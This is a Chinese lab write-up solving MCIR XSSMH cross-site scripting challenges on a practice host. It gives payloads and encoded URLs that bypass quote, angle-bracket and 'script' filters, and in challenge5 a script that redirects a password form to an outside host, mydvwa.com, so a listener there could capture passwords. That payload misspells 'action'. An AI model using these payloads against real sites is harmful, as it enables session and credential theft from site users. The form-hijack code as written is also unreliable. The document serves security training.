渗透测试：XSS实验集合

MCIR-XSSMH：challenge0

页面：/mcir/xssmh/challenges/challenge0.php

1、验证是否存在XSS注入：<script>alert(1)</script>

2、存在XSS注入，要求是弹出“Hello World”，调整注入内容：<script>alert("Hello, world!")</script>url如下：

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&inject_string=%3Cscript%3Ealert%28%22Hello%2C+world%21%22%29%3C%2Fscript%3E&submit=Inject%21

效果图如下

MCIR-XSSMH：challenge1

页面：/mcir/xssmh/challenges/challenge1.php

1、验证是否存在XSS注入：<script>alert(1)</script>

2、由于界面输入要求是对单引号和双引号进行处理，再不调整输入条件内容验证：

<script>alert("Hello, world!")</script>

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&sanitization_level=medium&sanitization_params=%22%2C%27&sanitization_type=keyword&inject_string=%3Cscript%3Ealert%28%22Hello%2C+world%21%22%29%3C%2Fscript%3E&submit=Inject%21

界面无弹窗，当输入非数值时，界面输入进行了转义，把字符串进行ASCII转码如下：

十进制ASCII码转换成字符：String.fromCodePoint(num1[, …[, numN]])、String.fromCharCode(num1[, …[, numN]])。fromCodePoint(), fromCharCode()两个都是String的静态方法，所以直接使用，不需要实例化。两者的主要区别是：fromCharCode() 出现的早，可以处理常用的字符编码；fromCodePoint() ES2015出现的，可以处理高位编码。

字符转换成十进制ASCII码：

'A'.charCodeAt() // 65
'a'.charCodeAt() // 97
'Z'.charCodeAt() // 90
'z'.charCodeAt() // 122

把字符串进行ASCII转码之后的输入如下：

<script>a=String.fromCodePoint(72,101,108,108,111,32,87,111,114,108,100,33);alert(a)</script>

完整的url如下：

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&sanitization_level=medium&sanitization_params=%22%2C%27&sanitization_type=keyword&inject_string=%3Cscript%3Ea%3DString.fromCodePoint%2872%2C101%2C108%2C108%2C111%2C32%2C87%2C111%2C114%2C108%2C100%2C33%29%3Balert%28a%29%3C%2Fscript%3E&submit=Inject%21

界面效果如下：

MCIR-XSSMH：challenge2

页面：/mcir/xssmh/challenges/challenge2.php

1、在Injection String输入内容：<script>alert("Hello WelTest")</script>完整URL：

http://mcir.pte.com/mcir/xssmh/xss.php?location=body&persistent=on&inject_string=%3Cscript%3Ealert%28%22Hello+WelTest%22%29%3C%2Fscript%3E&submit=Inject%21

2、再URL输入链接：

http://mcir.pte.com/mcir/xssmh/pxss.html

MCIR-XSSMH：challenge3

页面：http://mcir.pte.com/mcir/xssmh/challenges/challenge3.php

当前实验的尖括号被移除"<，>"，因此不能使用

weltest" onclick="javascript:alert('Hello WelTest');

请求url内容如下：

http://mcir.pte.com/mcir/xssmh/xss.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=%3C%2C%3E&query_results=all_rows&error_level=verbose&inject_string=weltest%22+onclick%3D%22javascript%3Aalert%28%27Hello+WelTest%27%29%3B&location=attribute_double&custom_inject=&submit=Inject%21

点击"weltest"值所在的输入框弹出：

出现上图所示，表明注入成功。

MCIR-XSSMH：challenge4

页面：/mcir/xssmh/challenges/challenge4.php

Injection String输入框过滤了script值，输入信息中存在script字段，程序会进行转义处理。因此不能使用

<img src="knownsec" onerror=alert('HelloWelTest')>

URL请求如下：

http://mcir.pte.com/mcir/xssmh/xss.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=script&query_results=all_rows&error_level=verbose&inject_string=%3Cimg+src%3D%22knownsec%22+onerror%3Dalert%28%27HelloWelTest%27%29%3E+&location=body&custom_inject=&submit=Inject%21

页面效果如下：

页面注入源码如下：

至此，通过插入html元素，并给元素造错误属性，来实现页面注入。

MCIR-XSSMH：challenge5

页面：/mcir/xssmh/challenges/challenge5.php

当前实验目标是：调整密码提交的action，让密码不被提交到一个正确的地方。通过在页面进行一个正常的输入“123456789”，请求url如下：

http://mcir.pte.com/mcir/xssmh/xss.php?custom_inject=%3Cform+action%3D%22xss.php%22+name%3D%22xssform%22%3EEnter+password%3A%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E*INJECT*&inject_string=123456789&submit=Inject%21

界面输出如下：

分析正常响应页面元素及响应方法：

当前页面提交form的action在上图框选出来，通过分析form构造请求输入如下：

<script>document.getElementsByName('xssform')[0].aciton='http://mydvwa.com'</script>

页面源码如下：

该脚本执行结果如下：

如果http://mydvwa.com存在监听器，一旦出现这个操作，用户在界面输入的密码会被传输到http://mydvwa.com该网站中，可以被黑客利用。

MCIR-XSSMH：challenge6

页面：/mcir/xssmh/challenges/challenge6.php

解决方法与“MCIR-XSSMH：challenge0”解决方法一样。不一致的地方如下图所示：

需要输入内容如下：

</script><script>a=String.fromCodePoint(72,101,108,108,111,32,87,111,114,108,100,33);alert(a)</script>

URL内容如下：

http://mcir.pte.com/mcir/xssmh/xss.php?location=javascript&sanitization_level=reject_high&sanitization_params=%22&sanitization_type=keyword&inject_string=%3C%2Fscript%3E%3Cscript%3Ea%3DString.fromCodePoint%2872%2C101%2C108%2C108%2C111%2C32%2C87%2C111%2C114%2C108%2C100%2C33%29%3Balert%28a%29%3C%2Fscript%3E&submit=Inject%21

注入源码展示如下：

效果图如下：

MCIR-XSSMH：challenge7

页面：/mcir/xssmh/challenges/challenge7.php

输入正常值“Hello WelTest”查看页面源码：

参考“MCIR-XSSMH：challenge3”方法进行尝试：

weltest" accesskey="X" onclick="javascript:alert('Hello WelTest')；
weltest" accesskey="L" onclick="alert('Hello')

accesskey 属性规定激活（使元素获得焦点）元素的快捷键。各种浏览器下accesskey快捷键的使用方法:

IE浏览器：按住Alt键，点击accesskey定义的快捷键(焦点将移动到链接)，再按回车.
FireFox浏览器：按住Alt+Shift键，点击accesskey定义的快捷键.
Chrome浏览器：按住Alt键，点击accesskey定义的快捷键.
Opera浏览器：按住Shift键，点击esc，出现本页定义的accesskey快捷键列表可供选择.
Safari浏览器：按住Alt键，点击accesskey定义的快捷键.